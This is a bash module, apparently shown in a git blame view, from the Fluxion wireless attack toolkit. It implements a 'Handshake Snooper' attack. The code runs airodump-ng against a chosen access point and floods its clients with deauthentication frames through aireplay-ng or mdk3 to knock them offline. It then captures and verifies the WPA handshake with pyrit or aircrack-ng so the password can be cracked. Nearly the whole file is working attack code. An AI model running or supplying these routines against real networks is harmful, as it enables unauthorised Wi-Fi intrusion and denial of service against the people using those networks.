2017-08-08 12:21:46 -06:00
|
|
|
#!/bin/bash
|
|
|
|
|
|
|
|
########################### < Handshake Snooper Parameters > ###########################
|
|
|
|
|
|
|
|
HandshakeSnooperState="Not Ready"
|
|
|
|
|
|
|
|
################################# < Handshake Snooper > ################################
|
|
|
|
function handshake_verifier_daemon() {
|
|
|
|
if [ ${#@} -lt 5 ]; then return 1; fi
|
|
|
|
|
|
|
|
handshakeVerifierState="running"
|
|
|
|
|
|
|
|
function handle_verifier_abort() {
|
|
|
|
handshakeVerifierState="aborted"
|
|
|
|
}
|
|
|
|
|
|
|
|
trap handle_verifier_abort SIGABRT
|
|
|
|
|
|
|
|
source lib/HashUtils.sh
|
|
|
|
|
|
|
|
local handshakeCheckResult=1 # Assume invalid
|
|
|
|
while [ $handshakeCheckResult -ne 0 -a "$handshakeVerifierState" = "running" ]; do
|
|
|
|
sleep 3
|
2017-08-09 22:30:23 -06:00
|
|
|
pyrit -r "$4" -o "${4/.cap/-clean.cap}" stripLive
|
|
|
|
hash_check_handshake "$3" "${4/.cap/-clean.cap}" "${@:5:2}"
|
2017-08-08 12:21:46 -06:00
|
|
|
handshakeCheckResult=$?
|
|
|
|
done
|
|
|
|
|
|
|
|
# If handshake didn't pass verification, it was aborted.
|
|
|
|
if [ $handshakeCheckResult -ne 0 ]; then return 1; fi
|
|
|
|
|
2017-08-09 17:36:23 -06:00
|
|
|
# Assure we've got a directory to store hashes into.
|
|
|
|
local hashDirectory=$(dirname "$2")
|
|
|
|
if [ ! -d "$hashDirectory" ]; then
|
|
|
|
mkdir -p "$hashDirectory"
|
|
|
|
fi
|
|
|
|
|
|
|
|
# Move handshake to storage if one was acquired.
|
2017-08-08 12:21:46 -06:00
|
|
|
mv "${4/.cap/-clean.cap}" "$2"
|
|
|
|
|
|
|
|
# Signal parent process the verification terminated.
|
|
|
|
kill -s SIGABRT $1
|
|
|
|
}
|
|
|
|
|
|
|
|
function handshake_stop_verifier() {
|
|
|
|
if [ "$HANDSHAKEVerifierPID" ]; then
|
|
|
|
kill -s SIGABRT $HANDSHAKEVerifierPID &> $FLUXIONOutputDevice
|
|
|
|
fi
|
|
|
|
|
|
|
|
HANDSHAKEVerifierPID=""
|
|
|
|
}
|
|
|
|
|
|
|
|
function handshake_start_verifier() {
|
|
|
|
handshake_verifier_daemon $$ \
|
2017-08-10 21:02:12 -06:00
|
|
|
"$FLUXIONPath/attacks/Handshake Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap" \
|
|
|
|
"$HANDSHAKEVerifier" "$FLUXIONWorkspacePath/capture/dump-01.cap" \
|
2017-08-08 12:21:46 -06:00
|
|
|
"$APTargetSSID" "$APTargetMAC" &> $FLUXIONOutputDevice &
|
|
|
|
HANDSHAKEVerifierPID=$!
|
|
|
|
}
|
|
|
|
|
|
|
|
function handshake_stop_deauthenticator() {
|
|
|
|
if [ "$HANDSHAKEDeauthenticatorPID" ]; then
|
|
|
|
kill $HANDSHAKEDeauthenticatorPID &> $FLUXIONOutputDevice
|
|
|
|
fi
|
|
|
|
|
|
|
|
HANDSHAKEDeauthenticatorPID=""
|
|
|
|
}
|
|
|
|
|
|
|
|
function handshake_start_deauthenticator() {
|
|
|
|
if [ "$HANDSHAKEDeauthenticatorPID" ]; then return 0; fi
|
|
|
|
|
2017-08-08 14:55:24 -06:00
|
|
|
# Prepare deauthenticators
|
|
|
|
case "$HANDSHAKEMethod" in
|
2017-08-10 21:02:12 -06:00
|
|
|
"$HandshakeSnooperMdk3MethodOption") echo "$APTargetMAC" > $FLUXIONWorkspacePath/mdk3_blacklist.lst
|
2017-08-08 14:55:24 -06:00
|
|
|
esac
|
|
|
|
|
|
|
|
# Start deauthenticators.
|
2017-08-08 12:21:46 -06:00
|
|
|
case "$HANDSHAKEMethod" in
|
2017-08-10 21:02:12 -06:00
|
|
|
"$HandshakeSnooperAireplayMethodOption") xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \
|
2017-08-08 12:21:46 -06:00
|
|
|
aireplay-ng --deauth=9999999999 -a $APTargetMAC --ignore-negative-one $WIMonitor &
|
|
|
|
HANDSHAKEDeauthenticatorPID=$!;;
|
2017-08-10 21:02:12 -06:00
|
|
|
"$HandshakeSnooperMdk3MethodOption") xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \
|
2017-08-08 14:55:24 -06:00
|
|
|
mdk3 $WIMonitor d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $APTargetChannel &
|
2017-08-08 12:21:46 -06:00
|
|
|
HANDSHAKEDeauthenticatorPID=$!;;
|
|
|
|
esac
|
|
|
|
}
|
|
|
|
|
|
|
|
function handshake_stop_captor() {
|
|
|
|
if [ "$HANDSHAKECaptorPID" ]; then
|
|
|
|
kill $HANDSHAKECaptorPID &> $FLUXIONOutputDevice
|
|
|
|
fi
|
|
|
|
|
|
|
|
HANDSHAKECaptorPID=""
|
|
|
|
}
|
|
|
|
|
|
|
|
function handshake_start_captor() {
|
|
|
|
if [ "$HANDSHAKECaptorPID" ]; then return 0; fi
|
|
|
|
|
|
|
|
xterm -hold -title "Handshake Captor (CH $APTargetChannel)" $TOPRIGHT -bg "#000000" -fg "#FFFFFF" -e \
|
2017-08-10 21:02:12 -06:00
|
|
|
airodump-ng -d $APTargetMAC -w "$FLUXIONWorkspacePath/capture/dump" -c $APTargetChannel -a $WIMonitor &
|
2017-08-08 12:21:46 -06:00
|
|
|
|
|
|
|
sleep 3
|
|
|
|
HANDSHAKECaptorPID=$(ps a | awk '$5~/^airodump-ng/ && $7~/'"$APTargetMAC"'/{print $1}')
|
|
|
|
}
|
|
|
|
|
|
|
|
function handshake_unset_method() {
|
|
|
|
HANDSHAKEMethod=""
|
|
|
|
}
|
|
|
|
|
|
|
|
function handshake_set_method() {
|
|
|
|
if [ "$HANDSHAKEMethod" ]; then return 0; fi
|
|
|
|
|
2017-08-10 21:02:12 -06:00
|
|
|
local methods=("$HandshakeSnooperMonitorMethodOption" "$HandshakeSnooperAireplayMethodOption" "$HandshakeSnooperMdk3MethodOption" "$FLUXIONGeneralBackOption")
|
|
|
|
io_query_choice "$HandshakeSnooperMethodQuery" methods[@]
|
2017-08-08 12:21:46 -06:00
|
|
|
|
|
|
|
HANDSHAKEMethod=$IOQueryChoice
|
|
|
|
|
2017-08-10 21:02:12 -06:00
|
|
|
if [ "$HANDSHAKEMethod" = "$FLUXIONGeneralBackOption" ]; then
|
2017-08-08 12:21:46 -06:00
|
|
|
handshake_unset_method
|
|
|
|
return 1
|
|
|
|
fi
|
|
|
|
}
|
|
|
|
|
|
|
|
function handshake_unset_verifier() {
|
|
|
|
HANDSHAKEVerifier=""
|
|
|
|
}
|
|
|
|
|
|
|
|
function handshake_set_verifier() {
|
|
|
|
if [ "$HANDSHAKEVerifier" ]; then return 0; fi
|
|
|
|
|
2017-08-10 21:02:12 -06:00
|
|
|
local choices=("$FLUXIONHashVerificationMethodPyritOption" "$FLUXIONHashVerificationMethodAircrackOption" "$FLUXIONGeneralBackOption")
|
|
|
|
io_query_choice "$FLUXIONHashVerificationMethodQuery" choices[@]
|
2017-08-08 12:21:46 -06:00
|
|
|
|
2017-08-10 21:02:12 -06:00
|
|
|
case "$IOQueryChoice" in
|
|
|
|
"$FLUXIONHashVerificationMethodPyritOption") HANDSHAKEVerifier="pyrit";;
|
|
|
|
"$FLUXIONHashVerificationMethodAircrackOption") HANDSHAKEVerifier="aircrack-ng";;
|
|
|
|
"$FLUXIONGeneralBackOption")
|
|
|
|
handshake_unset_verifier
|
|
|
|
handshake_unset_method
|
|
|
|
return 1;;
|
|
|
|
esac
|
2017-08-08 12:21:46 -06:00
|
|
|
}
|
|
|
|
|
|
|
|
function unprep_attack() {
|
|
|
|
HandshakeSnooperState="Not Ready"
|
|
|
|
handshake_unset_verifier
|
|
|
|
handshake_unset_method
|
|
|
|
|
|
|
|
sandbox_remove_workfile "$FLUXIONWorkspacePath/capture"
|
|
|
|
}
|
|
|
|
|
|
|
|
function prep_attack() {
|
2017-08-10 21:02:12 -06:00
|
|
|
mkdir -p "$FLUXIONWorkspacePath/capture"
|
2017-08-08 12:21:46 -06:00
|
|
|
|
|
|
|
while true; do
|
|
|
|
handshake_set_method; if [ $? -ne 0 ]; then break; fi
|
|
|
|
handshake_set_verifier; if [ $? -ne 0 ]; then continue; fi
|
|
|
|
HandshakeSnooperState="Ready"
|
|
|
|
break
|
|
|
|
done
|
|
|
|
|
|
|
|
# Check for handshake abortion.
|
|
|
|
if [ "$HandshakeSnooperState" = "Not Ready" ]; then
|
|
|
|
unprep_attack
|
|
|
|
return 1;
|
|
|
|
fi
|
|
|
|
}
|
|
|
|
|
|
|
|
function stop_attack() {
|
|
|
|
handshake_stop_deauthenticator
|
|
|
|
handshake_stop_verifier
|
|
|
|
handshake_stop_captor
|
|
|
|
handshake_unset_verifier
|
|
|
|
}
|
|
|
|
|
|
|
|
# Parameters: path, SSID, MAC
|
|
|
|
function start_attack() {
|
|
|
|
handshake_start_captor
|
|
|
|
handshake_start_deauthenticator
|
|
|
|
handshake_start_verifier
|
|
|
|
}
|
|
|
|
# FLUXSCRIPT END
|